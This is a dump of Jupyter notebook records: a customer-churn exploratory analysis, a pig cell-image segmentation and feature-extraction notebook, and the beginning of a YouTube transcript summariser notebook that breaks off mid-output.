"<class 'pandas.core.frame.DataFrame'>\nInt64Index: 7032 entries, 0 to 7042\nData columns (total 20 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 gender 7032 non-null object \n 1 SeniorCitizen 7032 non-null int64 \n 2 Partner 7032 non-null int32 \n 3 Dependents 7032 non-null int32 \n 4 tenure 7032 non-null int64 \n 5 PhoneService 7032 non-null int32 \n 6 MultipleLines 7032 non-null object \n 7 InternetService 7032 non-null object \n 8 OnlineSecurity 7032 non-null object \n 9 OnlineBackup 7032 non-null object \n 10 DeviceProtection 7032 non-null object \n 11 TechSupport 7032 non-null object \n 12 StreamingTV 7032 non-null object \n 13 StreamingMovies 7032 non-null object \n 14 Contract 7032 non-null object \n 15 PaperlessBilling 7032 non-null int32 \n 16 PaymentMethod 7032 non-null object \n 17 MonthlyCharges 7032 non-null float64\n 18 TotalCharges 7032 non-null float64\n 19 Churn 7032 non-null int32 \ndtypes: float64(2), int32(5), int64(2), object(11)\nmemory usage: 1.3+ MB\n"
]
],
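[
[
"# Editor's sketch (not in the original notebook): inspect the mapping that the last\n# fit_transform learned; LabelEncoder sorts classes alphabetically, so 'No' -> 0 and 'Yes' -> 1.\ndict(zip(label.classes_, label.transform(label.classes_)))",
"_____no_output_____"
]
],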
[
[
"# Numerical features",
"_____no_output_____"
]
],
[
[
"# Plot all numerical fields using \"Churn\" as hue\ng = sns.pairplot(df, hue=\"Churn\",vars=['MonthlyCharges','TotalCharges','tenure'],aspect=1.5);",
"_____no_output_____"
]
],
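[
[
"# Editor's sketch (not in the original notebook): median numeric values by churn\n# status back up the pairplot reading summarised in the next cell.\ndf.groupby('Churn')[['tenure', 'MonthlyCharges', 'TotalCharges']].median().round(1)",
"_____no_output_____"
]
],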
[
[
"General feel\n\n* Most churn occurs when the customers are new ( low tenure ), higher Total Charges (~ `$`820) and higher Monthly Charges (~ `$`120)\n \n* Note : Orange is Churn",
"_____no_output_____"
],
[
"# Categorical features",
"_____no_output_____"
],
[
"This dataset has 16 categorical features:\n\n* Five binary features (Yes/No)\n* Nine features with three unique values \n* One feature with four unique values",
"_____no_output_____"
],
[
"## Age(SeniorCitizen) and Gender",
"_____no_output_____"
]
],
[
[
"g = sns.catplot(x=\"gender\", hue='Churn',kind=\"count\", data=df)\ng.fig.suptitle('Churn based on Gender');",
"_____no_output_____"
],
[
"df.groupby(['SeniorCitizen'])['Churn'].value_counts(normalize=True).round(2)",
"_____no_output_____"
],
[
"df.groupby(['SeniorCitizen'])['Churn'].value_counts()",
"_____no_output_____"
],
[
"df['SeniorCitizen'].value_counts()",
"_____no_output_____"
],
[
"sns.catplot(x=\"SeniorCitizen\", hue='Churn',kind=\"count\", data=df)\ng.fig.suptitle('Churn based on Age - SeniorCitizen');",
"_____no_output_____"
]
],
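[
[
"# Editor's sketch (not in the original notebook): pd.crosstab gives the same\n# churn-rate-by-group view as the groupby/value_counts calls above in a single call.\npd.crosstab(df['SeniorCitizen'], df['Churn'], normalize='index').round(2)",
"_____no_output_____"
]
],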
[
[
"Senior Citizen churn % rate ( 42% vs 24% ) . \n<br>Meaning almost 50% chance that a Senior Citizen Subsciber will churn eventhough the total count subscriber ratio is significantly lesser - 1 Senior vs 6 Non Senior",
"_____no_output_____"
],
[
"* Not much effect between gender\n* Most churn occurs around `$`30, `$`50 and `$`70",
"_____no_output_____"
],
[
"## Partner and Dependents",
"_____no_output_____"
]
],
[
[
"pd.concat([\n df.groupby(['Partner'])['Churn'].value_counts().round().to_frame(),\n df.groupby(['Partner'])['Churn'].value_counts(normalize=True).round(2).to_frame(name='%'), \n ],\n axis=1)",
"_____no_output_____"
],
[
"g = sns.catplot(x=\"Partner\", hue='Churn',kind=\"count\", data=df)\ng.fig.suptitle('Churn based on hasPartner');",
"_____no_output_____"
]
],
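[
[
"# Editor's sketch (not in the original notebook): the concat/groupby pattern above is\n# repeated for many features below, so a small helper like this would keep it DRY.\ndef churn_summary(col):\n    '''Return churn counts and within-group percentages for one feature.'''\n    counts = df.groupby([col])['Churn'].value_counts().to_frame(name='count')\n    pct = df.groupby([col])['Churn'].value_counts(normalize=True).round(2).to_frame(name='%')\n    return pd.concat([counts, pct], axis=1)\n\nchurn_summary('Partner')",
"_____no_output_____"
]
],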
[
[
"If there is no Partner, the tendency to Churn is higher. Dual income has lesser chance to churn",
"_____no_output_____"
]
],
[
[
"pd.concat([\n df.groupby(['Dependents'])['Churn'].value_counts().round().to_frame(),\n df.groupby(['Dependents'])['Churn'].value_counts(normalize=True).round(2).to_frame(name='%'), \n ],\n axis=1)",
"_____no_output_____"
],
[
"g = sns.catplot(x=\"Dependents\", hue='Churn',kind=\"count\", data=df)\ng.fig.suptitle('Churn based on hasDependents');",
"_____no_output_____"
]
],
[
[
"If there is no Dependents, the tendency to Churn is higher. It could be adults that has Dependents are more responsible.",
"_____no_output_____"
],
[
"## Multiple lines",
"_____no_output_____"
]
],
[
[
"pd.concat([\n df.groupby(['MultipleLines'])['Churn'].value_counts().round().to_frame(),\n df.groupby(['MultipleLines'])['Churn'].value_counts(normalize=True).round(2).to_frame(name='%'), \n ],\n axis=1)",
"_____no_output_____"
],
[
"g = sns.catplot(x=\"MultipleLines\", hue='Churn',kind=\"count\",data=df)\ng.fig.suptitle('Churn based on MultipleLines');",
"_____no_output_____"
]
],
[
[
"Multiple Lines doesn't seem to be a factor that contributes signifantly to the churn rate as all the 3 percentage are similar at around 25% and 'with MultiplineLines' registered the highest with 29%",
"_____no_output_____"
]
],
[
[
"g = sns.catplot(data=df,x=\"MultipleLines\", y=\"MonthlyCharges\", hue=\"Churn\", kind=\"violin\",split=True)\ng.fig.suptitle('Violin plot distributin of MonthlyCharges for Multiplelines');",
"_____no_output_____"
]
],
[
[
"Between the MultipleLines , the most occurence for each of the category are \n* 'No phone service' ~`$`25\n* 'No MultipleLines' ~`$`75\n* 'With MultipleLines' ~`$`100",
"_____no_output_____"
],
[
"## Phone Services",
"_____no_output_____"
]
],
[
[
"pd.concat([\n df.groupby(['PhoneService'])['Churn'].value_counts().round().to_frame(),\n df.groupby(['PhoneService'])['Churn'].value_counts(normalize=True).round(2).to_frame(name='%'), \n ],\n axis=1)",
"_____no_output_____"
],
[
"g = sns.catplot(x=\"PhoneService\", hue='Churn',kind=\"count\", data=df)\nplt.subplots_adjust(top=0.9)\ng.fig.suptitle('Churn based on PhoneService');",
"_____no_output_____"
]
],
[
[
"Phone Lines doesn't seem to be a factor that contributes signifantly to the churn rate as it's similar to MultipleLines at around 25%",
"_____no_output_____"
]
],
[
[
"g = sns.catplot(data=df,x=\"PhoneService\", y=\"MonthlyCharges\", hue=\"Churn\", kind=\"violin\",split=True)\nplt.subplots_adjust(top=0.9)\ng = g.fig.suptitle('Violin plot distribution of MonthlyCharges for PhoneService');",
"_____no_output_____"
]
],
[
[
"Most occurence of Churn occurs ~$70",
"_____no_output_____"
],
[
"## InternetService",
"_____no_output_____"
]
],
[
[
"pd.concat([\n df.groupby(['InternetService'])['Churn'].value_counts().round().to_frame(),\n df.groupby(['InternetService'])['Churn'].value_counts(normalize=True).round(2).to_frame(name='%'), \n ],\n axis=1)",
"_____no_output_____"
]
],
[
[
"If one has Fiber optic, the churn rate is high at around 42%.",
"_____no_output_____"
]
],
[
[
"g = sns.catplot(x=\"InternetService\", hue='Churn',kind=\"count\", data=df)\nplt.subplots_adjust(top=0.9)\ng.fig.suptitle('Churn based on InternetService');",
"_____no_output_____"
],
[
"g = sns.catplot(data=df,x=\"InternetService\", y=\"MonthlyCharges\", hue=\"Churn\", kind=\"violin\",split=True)\nplt.subplots_adjust(top=0.9)\ng = g.fig.suptitle('Violin plot distribution of MonthlyCharges for InternetService');",
"_____no_output_____"
]
],
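[
[
"# Editor's sketch (not in the original notebook): churn rate by MonthlyCharges band\n# quantifies the violin-plot picture above (Churn is already encoded 0/1, so the\n# group mean is the churn rate).\nbands = pd.cut(df['MonthlyCharges'], bins=[0, 40, 70, 100, 120])\ndf.groupby(bands)['Churn'].mean().round(2)",
"_____no_output_____"
]
],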
[
[
"For Fiber optic, the MonthlyCharges range is between `$`70 and `$`100",
"_____no_output_____"
],
[
"## PaymentMethod",
"_____no_output_____"
]
],
[
[
"pd.concat([\n df.groupby(['PaymentMethod'])['Churn'].value_counts().round().to_frame(),\n df.groupby(['PaymentMethod'])['Churn'].value_counts(normalize=True).round(2).to_frame(name='%'), \n ],\n axis=1)",
"_____no_output_____"
],
[
"# double brackets select the two columns as a DataFrame (tuple indexing is deprecated in pandas)\ndf.groupby(['PaymentMethod'])[['MonthlyCharges','TotalCharges']].agg(['median','mean']).round(0)",
"_____no_output_____"
]
],
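[
[
"# Editor's sketch (not in the original notebook): tenure by payment method helps explain\n# the TotalCharges pattern noted below, since TotalCharges scales with tenure and MonthlyCharges.\ndf.groupby('PaymentMethod')['tenure'].agg(['median', 'mean']).round(1)",
"_____no_output_____"
]
],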
[
[
"Those we paid using Electronic check has the highest tendency to churn at 45% eventhough the TotalCharges are not the highest<br>\nWe need to convert Electronic Check to other forms of payment. A one time rebate for conversion to entice them",
"_____no_output_____"
]
],
[
[
"g = sns.catplot(x=\"PaymentMethod\", hue='Churn',kind=\"count\", data=df)\nplt.subplots_adjust(top=0.9)\ng.fig.suptitle('Churn based on PaymentMethod');",
"_____no_output_____"
],
[
"g = sns.catplot(data=df,x=\"PaymentMethod\", y=\"MonthlyCharges\", hue=\"Churn\", kind=\"violin\",split=True)\nplt.subplots_adjust(top=0.9)\ng = g.fig.suptitle('Violin plot distribution of MonthlyCharges for InternetService');",
"_____no_output_____"
]
],
[
[
"## Contract",
"_____no_output_____"
]
],
[
[
"g = sns.catplot(x=\"Contract\", hue='Churn',kind=\"count\", data=df)\nplt.subplots_adjust(top=0.9)\ng.fig.suptitle('Churn based on Contract');",
"_____no_output_____"
],
[
"pd.concat([\n df.groupby(['Contract'])['Churn'].value_counts().round().to_frame(),\n df.groupby(['Contract'])['Churn'].value_counts(normalize=True).round(2).to_frame(name='%'), \n ],\n axis=1)",
"_____no_output_____"
]
],
[
[
"The shortest/no contract will tend to encourage Churn",
"_____no_output_____"
],
[
"## PaperlessBilling",
"_____no_output_____"
]
],
[
[
"g = sns.catplot(x=\"PaperlessBilling\", hue='Churn',kind=\"count\", data=df)\nplt.subplots_adjust(top=0.9)\ng.fig.suptitle('Churn based on PaperlessBilling');",
"_____no_output_____"
],
[
"pd.concat([\n df.groupby(['PaperlessBilling'])['Churn'].value_counts().round().to_frame(name='Churn Count'),\n df.groupby(['PaperlessBilling'])['Churn'].value_counts(normalize=True).round(2).to_frame(name='%'), \n ],\n axis=1)",
"_____no_output_____"
]
],
[
[
"The Paperless Billing will tend to encourage Churn, twice of non-paperless <br>\nWith this information, we need to remind customers via email or SMS",
"_____no_output_____"
]
],
[
[
"## Additional subscriptions",
"_____no_output_____"
],
[
"sns.scatterplot(x='MonthlyCharges',y='TotalCharges',hue='Churn',data=df);",
"_____no_output_____"
],
[
"df.head()",
"_____no_output_____"
],
[
"import pandas as pd\ndf = pd.read_csv('data/churn.csv')\ndf.head()",
"_____no_output_____"
],
[
"df.columns",
"_____no_output_____"
],
[
"df.PaperlessBilling.unique()",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e70727e68cb26ffb563e54d110542fad3dc70793 | 32,819 | ipynb | Jupyter Notebook | pig_analysis_segmentation.ipynb | Nance-Lab/cellmorphflows | 96d2debf037048ad6414153aada2993fb6300b46 | [
"MIT"
] | 1 | 2021-11-21T04:09:03.000Z | 2021-11-21T04:09:03.000Z | pig_analysis_segmentation.ipynb | Nance-Lab/cellmorphflows | 96d2debf037048ad6414153aada2993fb6300b46 | [
"MIT"
] | null | null | null | pig_analysis_segmentation.ipynb | Nance-Lab/cellmorphflows | 96d2debf037048ad6414153aada2993fb6300b46 | [
"MIT"
] | null | null | null | 35.985746 | 299 | 0.468448 | [
[
[
"# Purpose: Pig Cell Analysis",
"_____no_output_____"
],
[
"### Purpose: To segment and quantify features of all the pig data",
"_____no_output_____"
],
[
"Created by: Hawley Helmbrecht",
"_____no_output_____"
],
[
"Creation Date: 06/4/2021",
"_____no_output_____"
],
[
"Last Update: ",
"_____no_output_____"
],
[
"Notes:\n \n I did this process 3 times. First only using one of the channels. Second time, using a max intensity projection of all the channels since they appear to all be GFAP. And the third time with the max intensity projection and then with the binary fill holes after the remove small objects.\n \n I will do a qualitative check of segmentation accuracy to chose between these three for the VAMPIRE analysis and data visualization later. The current notebook shows the process for the 3rd option.",
"_____no_output_____"
],
[
"*Step 1: Import Necessary Packages*",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport pandas as pd\nfrom scipy import ndimage\n\nimport skimage.filters\nfrom skimage import morphology\nfrom skimage.measure import label, regionprops, regionprops_table\nfrom skimage.color import label2rgb\nfrom skimage import io\nfrom skimage import measure \n\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\n\nimport watermark\nimport os\nfrom PIL import Image",
"_____no_output_____"
]
],
[
[
"*Step 2: User Inputs*",
"_____no_output_____"
]
],
[
[
"#replace the example path from my computer with the path to the image on your computer\n\ncell_folder = '/Users/hhelmbre/Desktop/Hawley_Pig_Data'\n\nimage_type = '.tif'",
"_____no_output_____"
]
],
[
[
"*Step 3: Defining a Folder Cleaner Function to only Return Tif Images*",
"_____no_output_____"
]
],
[
[
"def folder_cleaner(folder, image_type):\n k=0\n for files in folder:\n if image_type in str(files):\n k+=1\n else:\n folder = np.delete(folder, np.argwhere(folder == str(files)))\n return folder",
"_____no_output_____"
]
],
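[
[
"# Added sketch (an alternative, not from the original workflow): the same filtering as\n# folder_cleaner above, written as a list comprehension; it keeps identical filenames.\ndef folder_cleaner_simple(folder, image_type):\n    return np.asarray([f for f in folder if image_type in str(f)])",
"_____no_output_____"
]
],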
[
[
"*Step 4: Get All Images in the Folder*",
"_____no_output_____"
]
],
[
[
"arr = os.listdir(cell_folder)\nfile_list = np.asarray(arr)\nfile_list = folder_cleaner(file_list, image_type)",
"_____no_output_____"
],
[
"file_list",
"_____no_output_____"
]
],
[
[
"*Step 5: Segmenting and Calculating Region Features on All Images*",
"_____no_output_____"
]
],
[
[
"properties_list = ('area', 'bbox_area', 'centroid', 'convex_area', \n 'eccentricity', 'equivalent_diameter', 'euler_number', \n 'extent', 'filled_area', 'major_axis_length', \n 'minor_axis_length', 'orientation', 'perimeter', 'solidity')\n",
"_____no_output_____"
],
[
"j = 0\nfor names in file_list:\n \n try:\n cell_im = io.imread(str(cell_folder + '/' + names))\n print('name', names, 'shape', cell_im.shape)\n shape = cell_im.shape\n \n #Some of the images did not have 3 channels but still appear to include only the GFAP stain\n if len(shape) == 3:\n green_cell_im = np.max(cell_im, axis=2)\n else:\n green_cell_im = cell_im\n \n thresh_li = skimage.filters.threshold_li(green_cell_im)\n binary_li = green_cell_im > thresh_li\n new_binary_li = morphology.remove_small_objects(binary_li, min_size=500)\n new_binary_li = ndimage.binary_fill_holes(new_binary_li)\n label_image = label(new_binary_li)\n \n #Saving the Segmented Image\n cell_im_name = str(cell_folder + '/' + names)\n size = len(cell_im_name)\n cell_im_mod = cell_im_name[:size - 4]\n im_to_save = Image.fromarray(new_binary_li)\n im_to_save.save(str(cell_im_mod + '_' + 'segmented.png'))\n \n #Feel free to add them here as well. The computational time is pretty efficient\n props = measure.regionprops_table(label_image, properties=(properties_list))\n\n if j == 0:\n df = pd.DataFrame(props)\n df['filename'] = names\n else:\n df2 = pd.DataFrame(props)\n df2['filename'] = names\n df = df.append(df2)\n \n except FileNotFoundError:\n continue\n\n j = 1",
"name 2347_PC_20x_F7.tif shape (1456, 1936, 3)\nname 2205_PC_20x_F8.tif shape (1456, 1936, 3)\nname 2441_PC_20x_F8.tif shape (1456, 1936, 3)\nname 2346_PC_20x_F8.tif shape (1456, 1936, 3)\nname 2347_PC_20x_F6.tif shape (1456, 1936, 3)\nname 2347_PC_20x_F4.tif shape (1456, 1936, 3)\nname 2347_PC_20x_F5.tif shape (1456, 1936, 3)\nname 2347_PC_20x_F1.tif shape (1456, 1936, 3)\nname 2347_PC_20x_F2.tif shape (1456, 1936, 3)\nname 2206_PC_20x_F8.tif shape (1456, 1936, 3)\nname 2347_PC_20x_F3.tif shape (1456, 1936, 3)\nname 2413_PC_20x_F4.tif shape (1456, 1936, 3)\nname 2317_PC_20x_F1.tif shape (1456, 1936, 3)\nname 2414_PC_20x_F1.tif shape (1456, 1936, 3)\nname 2413_PC_20x_F5.tif shape (1456, 1936, 3)\nname 2313_PC_20x_F1.tif shape (1456, 1936, 3)\nname 2313_PC_20x_F3.tif shape (1456, 1936, 3)\nname 2413_PC_20x_F7.tif shape (1456, 1936, 3)\nname 2306_PC_20x_F8.tif shape (1456, 1936, 3)\nname 2317_PC_20x_F2.tif shape (1456, 1936, 3)\nname 2414_PC_20x_F3.tif shape (1456, 1936, 3)\nname 2414_PC_20x_F2.tif shape (1456, 1936, 3)\nname 2317_PC_20x_F3.tif shape (1456, 1936, 3)\nname 2413_PC_20x_F6.tif shape (1456, 1936, 3)\nname 2313_PC_20x_F2.tif shape (1456, 1936, 3)\nname 2413_PC_20x_F2.tif shape (1456, 1936, 3)\nname 2313_PC_20x_F6.tif shape (1456, 1936, 3)\nname 2312_PC_20x_F8.tif shape (1456, 1936, 3)\nname 2317_PC_20x_F7.tif shape (1456, 1936, 3)\nname 2414_PC_20x_F6.tif shape (1456, 1936, 3)\nname 2414_PC_20x_F7.tif shape (1456, 1936, 3)\nname 2316_PC_20x_F8.tif shape (1456, 1936, 3)\nname 2317_PC_20x_F6.tif shape (1456, 1936, 3)\nname 2313_PC_20x_F7.tif shape (1456, 1936, 3)\nname 2413_PC_20x_F3.tif shape (1456, 1936)\nname 2413_PC_20x_F1.tif shape (1456, 1936, 3)\nname 2313_PC_20x_F5.tif shape (1456, 1936, 3)\nname 2317_PC_20x_F4.tif shape (1456, 1936, 3)\nname 2414_PC_20x_F5.tif shape (1456, 1936, 3)\nname 2414_PC_20x_F4.tif shape (1456, 1936, 3)\nname 2317_PC_20x_F5.tif shape (1456, 1936, 3)\nname 2313_PC_20x_F4.tif shape (1456, 1936, 3)\nname 2306_PC_20x_F2.tif shape (1456, 1936, 3)\nname 2412_PC_20x_F3.tif shape (1456, 1936, 3)\nname 2312_PC_20x_F7.tif shape (1456, 1936, 3)\nname 2317_PC_20x_F8.tif shape (1456, 1936, 3)\nname 2316_PC_20x_F6.tif shape (1456, 1936, 3)\nname 2414_PC_20x_F8.tif shape (1456, 1936, 3)\nname 2316_PC_20x_F7.tif shape (1456, 1936)\nname 2312_PC_20x_F6.tif shape (1456, 1936, 3)\nname 2412_PC_20x_F2.tif shape (1456, 1936, 3)\nname 2306_PC_20x_F3.tif shape (1456, 1936, 3)\nname 2313_PC_20x_F8.tif shape (1456, 1936, 3)\nname 2306_PC_20x_F1.tif shape (1456, 1936, 3)\nname 2312_PC_20x_F4.tif shape (1456, 1936, 3)\nname 2316_PC_20x_F5.tif shape (1456, 1936, 3)\nname 2316_PC_20x_F4.tif shape (1456, 1936, 3)\nname 2312_PC_20x_F5.tif shape (1456, 1936, 3)\nname 2412_PC_20x_F1.tif shape (1456, 1936, 3)\nname 2312_PC_20x_F1.tif shape (1456, 1936, 3)\nname 2306_PC_20x_F4.tif shape (1456, 1936, 3)\nname 2316_PC_20x_F1.tif shape (1456, 1936, 3)\nname 2412_PC_20x_F4.tif shape (1456, 1936, 3)\nname 2306_PC_20x_F5.tif shape (1456, 1936, 3)\nname 2413_PC_20x_F8.tif shape (1456, 1936, 3)\nname 2312_PC_20x_F2.tif shape (1456, 1936, 3)\nname 2306_PC_20x_F7.tif shape (1456, 1936, 3)\nname 2316_PC_20x_F3.tif shape (1456, 1936, 3)\nname 2316_PC_20x_F2.tif shape (1456, 1936, 3)\nname 2306_PC_20x_F6.tif shape (1456, 1936, 3)\nname 2312_PC_20x_F3.tif shape (1456, 1936, 3)\nname 2206_PC_20x_F4.tif shape (1456, 1936, 3)\nname 2205_PC_20x_F1.tif shape (1456, 1936)\nname 2441_PC_20x_F1.tif shape (1456, 1936, 3)\nname 2206_PC_20x_F5.tif shape (1456, 1936, 3)\nname 2346_PC_20x_F1.tif shape (1456, 
1936, 3)\nname 2346_PC_20x_F3.tif shape (1456, 1936, 3)\nname 2206_PC_20x_F7.tif shape (1456, 1936, 3)\nname 2205_PC_20x_F2.tif shape (1456, 1936, 3)\nname 2441_PC_20x_F3.tif shape (1456, 1936, 3)\nname 2441_PC_20x_F2.tif shape (1456, 1936, 3)\nname 2205_PC_20x_F3.tif shape (1456, 1936, 3)\nname 2206_PC_20x_F6.tif shape (1456, 1936, 3)\nname 2346_PC_20x_F2.tif shape (1456, 1936, 3)\nname 2347_PC_20x_F8.tif shape (1456, 1936, 3)\nname 2346_PC_20x_F6.tif shape (1456, 1936, 3)\nname 2206_PC_20x_F2.tif shape (1456, 1936, 3)\nname 2205_PC_20x_F7.tif shape (1456, 1936, 3)\nname 2441_PC_20x_F6.tif shape (1456, 1936, 3)\nname 2441_PC_20x_F7.tif shape (1456, 1936, 3)\nname 2205_PC_20x_F6.tif shape (1456, 1936, 3)\nname 2206_PC_20x_F3.tif shape (1456, 1936, 3)\nname 2346_PC_20x_F7.tif shape (1456, 1936, 3)\nname 2346_PC_20x_F5.tif shape (1456, 1936, 3)\nname 2206_PC_20x_F1.tif shape (1456, 1936, 3)\nname 2205_PC_20x_F4.tif shape (1456, 1936, 3)\nname 2441_PC_20x_F5.tif shape (1456, 1936, 3)\nname 2441_PC_20x_F4.tif shape (1456, 1936, 3)\nname 2205_PC_20x_F5.tif shape (1456, 1936, 3)\nname 2346_PC_20x_F4.tif shape (1456, 1936, 3)\n"
]
],
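[
[
"# Quick sanity check (added cell): the assembled table should have one row per segmented\n# region, with the measured properties and the filename as columns.\nprint(df.shape)\ndf.head()",
"_____no_output_____"
]
],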
[
[
"*Step 6: Caculating the Circularity*",
"_____no_output_____"
]
],
[
[
"df['circularity'] = 4*np.pi*df.area/df.perimeter**2",
"_____no_output_____"
]
],
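[
[
"# Added sanity check (a sketch, not part of the original analysis): circularity = 4*pi*A/P**2\n# should be roughly 1 for a disk and smaller for elongated shapes. skimage.draw is used here,\n# which the notebook above does not import.\nfrom skimage.draw import disk\ncheck_im = np.zeros((200, 200), dtype=bool)\nrr, cc = disk((100, 100), 60)\ncheck_im[rr, cc] = True\ncircle_props = regionprops(label(check_im))[0]\nprint(4*np.pi*circle_props.area/circle_props.perimeter**2)  # close to 1 for a circle",
"_____no_output_____"
]
],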
[
[
"*Step 7: Calculating the Aspect Ratio*",
"_____no_output_____"
]
],
[
[
"df['aspect_ratio'] = df.major_axis_length/df.minor_axis_length",
"_____no_output_____"
]
],
[
[
"*Step 8: Add in a column for the ID*",
"_____no_output_____"
]
],
[
[
"df['sample_id'] = df.filename.str[:4]",
"_____no_output_____"
]
],
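[
[
"# Worked example of the slice above (added for clarity): the first four characters of each\n# filename encode the sample id.\n'2347_PC_20x_F7.tif'[:4]",
"_____no_output_____"
]
],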
[
[
"*Step 9: Add in a column for the image number*",
"_____no_output_____"
]
],
[
[
"df['image_id'] = df.filename.str[-6:]",
"_____no_output_____"
],
[
"df['image_id'] = df.image_id.str[:2]",
"_____no_output_____"
],
[
"df",
"_____no_output_____"
]
],
[
[
"*Step 10: Saving as a CSV file*",
"_____no_output_____"
]
],
[
[
"df.to_csv('/Users/hhelmbre/Desktop/Hawley_Pig_Data/06_04_2021_allim_features_maxint_fill2.csv')",
"_____no_output_____"
]
],
[
[
"*Step 11: Print Dependencies and State*",
"_____no_output_____"
]
],
[
[
"%load_ext watermark\n\n%watermark -v -m -p numpy,pandas,scipy,skimage,matplotlib,wget\n\n%watermark -u -n -t -z",
"The watermark extension is already loaded. To reload it, use:\n %reload_ext watermark\nPython implementation: CPython\nPython version : 3.7.4\nIPython version : 7.8.0\n\nnumpy : 1.17.2\npandas : 0.25.1\nscipy : 1.3.1\nskimage : 0.17.2\nmatplotlib: 3.1.1\nwget : not installed\n\nCompiler : Clang 4.0.1 (tags/RELEASE_401/final)\nOS : Darwin\nRelease : 20.3.0\nMachine : x86_64\nProcessor : i386\nCPU cores : 8\nArchitecture: 64bit\n\nLast updated: Fri Jun 04 2021 10:17:05MST\n\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
e707282918b26347fcc866ad779f1d96da4def7b | 96,491 | ipynb | Jupyter Notebook | 1) YouTube_Preprocessing.ipynb | somanyadav/Youtube-Summariser | b985662ee3e2c3d2920b3b9d15b50e359d7fc05e | [
"MIT"
] | null | null | null | 1) YouTube_Preprocessing.ipynb | somanyadav/Youtube-Summariser | b985662ee3e2c3d2920b3b9d15b50e359d7fc05e | [
"MIT"
] | null | null | null | 1) YouTube_Preprocessing.ipynb | somanyadav/Youtube-Summariser | b985662ee3e2c3d2920b3b9d15b50e359d7fc05e | [
"MIT"
] | null | null | null | 108.78354 | 33,438 | 0.712388 | [
[
[
"!pip install youtube_transcript_api",
"Requirement already satisfied: youtube_transcript_api in /usr/local/lib/python3.7/dist-packages (0.4.3)\nRequirement already satisfied: requests in /usr/local/lib/python3.7/dist-packages (from youtube_transcript_api) (2.23.0)\nRequirement already satisfied: urllib3!=1.25.0,!=1.25.1,<1.26,>=1.21.1 in /usr/local/lib/python3.7/dist-packages (from requests->youtube_transcript_api) (1.24.3)\nRequirement already satisfied: idna<3,>=2.5 in /usr/local/lib/python3.7/dist-packages (from requests->youtube_transcript_api) (2.10)\nRequirement already satisfied: chardet<4,>=3.0.2 in /usr/local/lib/python3.7/dist-packages (from requests->youtube_transcript_api) (3.0.4)\nRequirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.7/dist-packages (from requests->youtube_transcript_api) (2021.10.8)\n"
],
[
"from youtube_transcript_api import YouTubeTranscriptApi",
"_____no_output_____"
],
[
"from IPython.display import YouTubeVideo",
"_____no_output_____"
],
[
"video=input(\"Enter the link of your YouTube Video: \")",
"Enter the link of your YouTube Video: https://www.youtube.com/watch?v=tXVNS-V39A0\n"
],
[
"id_video=video.split(\"=\")[1]\nprint(id_video)",
"tXVNS-V39A0\n"
],
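[
"# A more robust alternative (added sketch): parse the query string instead of splitting on '=',\n# which breaks on URLs with extra parameters. Assumes a standard watch?v= URL.\nfrom urllib.parse import urlparse, parse_qs\nparse_qs(urlparse(video).query)['v'][0]",
"_____no_output_____"
],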
[
"YouTubeVideo(id_video)",
"_____no_output_____"
],
[
"transcript = YouTubeTranscriptApi.get_transcript(id_video)",
"_____no_output_____"
],
[
"transcript",
"_____no_output_____"
],
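[
"# Added inspection cell: each transcript entry is a dict with 'text', 'start' and 'duration'\n# keys; the loops below rely only on 'text'.\ntranscript[0]",
"_____no_output_____"
],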
[
"doc = \"\"\nfor line in transcript:\n doc =doc+ ' ' + line['text']\nprint(type(doc))\nprint(doc)\n#print(len(result))",
"<class 'str'>\n Machine learning is\na complex discipline but implementing machine\nlearning models is far less daunting and difficult than it used to be. Thanks to machine learning Frameworks\nsuch as Google's TensorFlow that ease the process of acquiring data, training model,\nsolving predictions and refining future\nresults. Created by the Google brain team tensorflow\nis an open source library for numerical computation and large scale machine learning.\nTensorflow bundles together a study of machine learning and deep learning models and algorithms and make\nthem useful by way of common metaphor who will use machine learning\nand all of its products to improve the search engine\nthe translation image captioning or the recommendations to give\nyou a concrete example, Google users can experience\na faster and more refined search with artificial intelligence. If the user types a keyword\nin the search bar Google provides a recommendation about\nwhat could be the next world not as a flow is being used\nby a lot of Companies in the industries and\nto name a few first let's start with Airbnb, the leading Global\nOnline Marketplace and Hospitality service. The Airbnb ingenious\nand data science team applies machine learning using tensorflow to\nclassify the images and detect objects at scale helping to improve\nthe guest experience and we talked about the healthcare industry\nusing 